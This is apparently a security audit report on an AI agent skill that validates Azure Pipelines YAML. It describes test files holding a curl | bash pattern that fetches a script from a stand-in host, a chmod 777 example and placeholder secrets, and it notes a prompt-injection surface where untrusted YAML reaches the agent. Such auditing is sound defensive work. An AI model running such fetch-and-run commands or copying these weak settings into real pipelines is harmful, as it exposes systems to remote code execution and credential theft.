azure-pipelines-validator
Fail
Audited by Gen Agent Trust Hub on Mar 28, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONCREDENTIALS_UNSAFEEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: Example files in the
examples/directory (specificallyregression-conditional-danger.ymlandtest-with-issues.yml) contain shell piping patterns (curl | bash) targeting external scripts (https://bad.example/install.sh). These are documented test cases for the validator's detection engine.- [EXTERNAL_DOWNLOADS]: Thescripts/python_wrapper.shscript dynamically installsPyYAMLandyamllintfrom the Python Package Index (PyPI) to satisfy dependencies at runtime.- [COMMAND_EXECUTION]: The skill uses shell and Python scripts to analyze pipeline YAMLs. It contains a test case (examples/test-with-issues.yml) that useschmod 777to demonstrate detection of overly permissive file permissions.- [CREDENTIALS_UNSAFE]: Theexamples/test-with-issues.ymlfile contains hardcoded placeholder secrets (apiKey,PASSWORD) used to test the scanner's secret detection capabilities.- [PROMPT_INJECTION]: The skill processes untrusted YAML pipeline data and presents findings to the agent, creating a surface for indirect prompt injection. - Ingestion points: Azure Pipeline YAML files (
azure-pipelines.yml). - Boundary markers: None present in the report generation instructions.
- Capability inventory: Shell execution (
bash), Python script execution, and file system operations. - Sanitization: Employs
yaml.safe_load()for initial parsing but does not provide explicit sanitization for display names or comments processed from the YAML.
Recommendations
- HIGH: Downloads and executes remote code from: https://bad.example/install.sh - DO NOT USE without thorough review
Audit Metadata